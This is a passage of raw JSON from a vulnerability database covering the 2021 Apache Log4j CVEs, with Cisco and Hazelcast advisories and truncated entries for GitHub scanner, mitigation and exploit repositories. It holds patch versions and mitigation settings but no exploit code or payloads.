Java Logging Library\n\nOn December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:\n\nCVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints\n\nOn December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:\n\nCVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack\n\nOn December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:\n\nCVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation\n\nOn December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was disclosed:\n\nCVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration\n\nFor a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities [\"https://logging.apache.org/log4j/2.x/security.html\"] page.\n\nCisco's Response to These Vulnerabilities\n\nCisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21 [\"https://www.snort.org/advisories/talos-rules-2021-12-21\"]\n\nProduct fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.\n\nCisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities.\n\nCisco's standard practice is to update integrated third-party software components to later versions as they become available.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\"]", "cvss3": {}, "published": "2021-12-10T18:45:00", "type": "cisco", "title": "Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-31T21:16:10", "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", "cvss": {"score": 6.6, "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"}}], "githubexploit": [{"lastseen": "2022-03-31T08:13:42", "description": "<h1><img src='https://raw.githubusercontent.com/mergebase/log4j-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T00:29:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-31T03:02:14", "id": "C68080B0-3163-5E76-AD65-2B454DBB95EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T00:04:58", "description": "<pre>\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:29:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-03-05T22:52:28", "id": "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-08T20:34:24", "description": "# CVE-2021-44228 a.k.a. LOG4J\nThis is a public repository from W...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T15:13:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-45105", "CVE-2021-44228"], "modified": "2022-01-08T17:32:42", "id": "C772DCBB-20D0-51DD-A580-F96689E65773", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:29:14", "description": "# divd-2021-00038--log4j-scanner\n\nThis scanner will recursively ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T12:16:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-05T07:52:27", "id": "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T12:33:49", "description": "# Patch pulsar images with Apache Log4J 2.17.1 upgrade\n\nCovers [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:46:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-18T12:16:50", "id": "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T00:04:09", "description": "<pre>\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:29:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-03-05T22:52:28", "id": "44463794-7940-582A-AFFF-676628A86A72", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:38", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:43", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "342CC1B7-6E24-5767-A7B1-90B95A91B503", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:34:22", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "DECBAC7B-9235-5E00-81C1-142CD41306FB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:38:51", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "C76F7089-967B-5A7F-B8DA-629452876A2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T01:27:14", "description": "# log4j-finder\n\nA Python3 script to scan the filesystem to find ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T10:04:42", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-30T22:28:03", "id": "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T12:02:26", "description": "# scan4log4shell\n> Scanner to send specially crafted requests an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T06:09:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-02-27T02:39:14", "id": "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T17:13:06", "description": "# \ud83d\udca1 Log4j CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 Resourc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T11:34:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T15:25:17", "id": "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "osv": [{"lastseen": "2023-04-11T01:40:12", "description": "### Impact\nA highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.\n\nThis affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive). \n\nThis vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.\n\nAnother vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investigated by Hazelcast team and it is confirmed that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-44832 on 12/28/2021, which is a medium vulnerability, is investigated by our security team as well, and not considered to be as critical. It requires attacker to be able to modify logging configuration, which means attacker can modify the filesystem and/or can already execute arbitrary code which is more of a general security breach rather than something log4j specific.\n\nNote that Hazelcast IMDG and IMDG Enterprise itself is not affected.\n\nHowever, given version distributions are considered to be vulnerable since related ZIP and TGZ distributions contain a vulnerable Hazelcast Management Center version.\n\n### Patches\nCVE-2021-44228 is fixed in log4j 2.15.0.\nCVE-2021-45046 is fixed in log4j 2.16.0.\nCVE-2021-45105 is fixed in log4j 2.17.0.\nCVE-2021-44832 is fixed in log4j 2.17.1.\n\nAs of 12/21/2021, Hazelcast team has released a new version of all affected products that upgrades log4j to 2.17.0 as listed below: \nHazelcast Management Center 4.2021.12-1, Hazelcast Management Center 5.0.4.\nHazelcast IMDG and IMDG Enterprise 4.0.5, 4.1.8 and 4.2.4.\nHazelcast Jet 4.5.3.\nHazelcast Platform 5.0.2.\n\nAs of 01/06/2022, Hazelcast Management Center 4.2022.01 with the updated log4j 2.17.1 is released. log4j2.17.1 will be included in Management Center 5.1 that is expected to be released in February. \n\nHazelcast recommends upgrading to the latest versions available.\n\n### Workarounds\nFor users that an upgrade is not an option, below mitigations can be applied.\n\n#### Disabling lookups via Environment Variable \nSetting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true .\nThis option is the easiest to apply for containerized environments.\n\n#### Disabling lookups in log4j2 configuration\nAnother good option since there is no need to replace JARs or no need to modify logging configuration file, users who cannot upgrade to 2.17.0 can mitigate the exposure by:\n\nUsers of Log4j 2.10 or greater may add `-Dlog4j2.formatMsgNoLookups=true `as a command line option or add `-Dlog4j2.formatMsgNoLookups=true` in a `log4j2.component.properties` file on the classpath to prevent lookups in log event messages.\nUsers since Log4j 2.7 may specify `%m{nolookups}` in the PatternLayout configuration to prevent lookups in log event messages.\nAs an example; users deploying Hazelcast Management Center via helm charts can do the following to disable lookups and restart in one command:\n\n`helm upgrade <release-name> hazelcast/hazelcast --set mancenter.javaOpts=\"<javaOpts> -Dlog4j2.formatMsgNoLookups=true\"`\n\nWhere <release-name> is the release name and <javaOpts> is existing java options user has added previously.\n\n#### Removing the JndiLookup from classpath\nRemove the JndiLookup and JndiManager classes from the log4j-core jar. Note that removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046\nhttps://vulners.com/cve/CVE-2021-45105\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44832\nhttps://logging.apache.org/log4j/2.x/index.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [our repo](https://github.com/hazelcast/hazelcast)\n* Slack us at [Hazelcast Community Slack](https://slack.hazelcast.com/)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-21T23:25:04", "type": "osv", "title": "Security Advisory for \"Log4Shell\"", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 